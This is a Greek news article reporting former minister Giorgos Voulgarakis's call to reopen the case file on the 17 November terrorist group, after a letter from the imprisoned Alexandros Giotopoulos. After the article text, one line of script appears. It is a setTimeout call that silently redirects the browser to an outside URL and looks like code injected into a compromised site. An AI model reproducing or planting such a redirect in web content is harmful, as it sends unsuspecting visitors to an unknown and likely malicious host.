Βουλγαράκης: Ο φάκελος της 17Ν πρέπει να ανοίξει ξανά

0
5

Με ανάρτησή του στο Facebook o πρώην υπουργός, Γιώργος Βουλγαράκης, αναφέρεται στην επιστοή του Αλέξανδρου Γιωτόπουλου, τονίζοντας πως πρέπει να ανοίξει ξανά ο φάκελος της τρομοκρατικής οργάνωσης 17 Νοέμβρη,σημειώνοντας πως «όλοι οι υπηρεσιακοί παράγοντες με είχαν διαβεβαιώσει ότι ο φάκελος 17Ν έχει κλείσει οριστικά και ότι ο εκτελεστικός βραχίονας της οργάνωσης, είχε εξαρθρωθεί πλήρως. Μου είχε κάνει εντύπωση ότι την ίδια ώρα, σε συζητήσεις που είχα με εκπροσώπους ξένων υπηρεσιών, εισέπραττα την άποψη ότι αυτό ήταν λάθος. Παρ όλα αυτά, στο ΥΔΤ δεν υπήρχαν περισσότερα στοιχεία».

Ο Γιώργος Βουλγαράκης σημειώνει: «Σήμερα στην επιστολή Γιωτόπουλου από τον Κορυδαλλό διαβάζω για 8 μέλη που δεν έχουν συλληφθεί και μάλιστα «…ότι οδηγούσαν σε έναν συγκεκριμένο πολιτικό χώρο, τον οποίο δεν ήθελαν να αγγίξουν. Που δεν είναι βέβαια η αριστερά είτε κοινοβουλευτική είτε εξωκοινοβουλευτική».

«Η επιστολή Γιωτόπουλου, στο βαθμό που είναι αξιόπιστη, επιβεβαιώνει υποψίες χρόνων που είχαμε όλοι εμείς στη ΝΔ. Είναι συνεπώς προφανές ότι ο φάκελος 17Ν πρέπει να ανοίξει ξανά και η Νέα Δημοκρατία έχει υποχρέωση να το ζητήσει δημόσια» υπογραμμίζεται.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here